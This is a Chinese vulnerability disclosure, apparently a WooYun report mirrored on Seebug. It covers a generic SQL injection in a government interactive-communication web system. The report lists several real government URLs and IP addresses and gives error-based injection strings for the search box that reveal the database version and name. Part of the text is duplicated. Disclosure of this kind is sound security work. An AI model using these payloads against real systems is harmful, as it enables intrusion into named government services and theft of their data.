### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#9。 案例: http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://60.215.8.148:6006//InteractiveCommunication/InterActiveIndex.aspx http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://shenpi.dongying.gov.cn/fabu/InteractiveCommunication/InterActiveIndex.aspx http://222.135.78.34:8086/InteractiveCommunication/InterActiveIndex.aspx ### 漏洞证明: 证明: http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx 搜索:单引号 [<img src="https://images.seebug.org/upload/201506/021326471282d9f2847d9fba9e7cc8c3ec4ff217.png" alt="QQ图片20150602132249.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/021326471282d9f2847d9fba9e7cc8c3ec4ff217.png) 搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本 [<img src="https://images.seebug.org/upload/201506/02132656ca69c655cd5f8030c7aaeed9912f833e.png" alt="QQ图片20150602132324.png" width="600"...
### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#9。 案例: http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://60.215.8.148:6006//InteractiveCommunication/InterActiveIndex.aspx http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://shenpi.dongying.gov.cn/fabu/InteractiveCommunication/InterActiveIndex.aspx http://222.135.78.34:8086/InteractiveCommunication/InterActiveIndex.aspx ### 漏洞证明: 证明: http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx 搜索:单引号 [<img src="https://images.seebug.org/upload/201506/021326471282d9f2847d9fba9e7cc8c3ec4ff217.png" alt="QQ图片20150602132249.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/021326471282d9f2847d9fba9e7cc8c3ec4ff217.png) 搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本 [<img src="https://images.seebug.org/upload/201506/02132656ca69c655cd5f8030c7aaeed9912f833e.png" alt="QQ图片20150602132324.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/02132656ca69c655cd5f8030c7aaeed9912f833e.png) 搜索 1' and db_name()=1 and '%'=' 报错曝出数据库表名 [<img src="https://images.seebug.org/upload/201506/021327036b1bdafec7fc26d9cca8aaa033f1291a.png" alt="QQ图片20150602132405.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/021327036b1bdafec7fc26d9cca8aaa033f1291a.png)
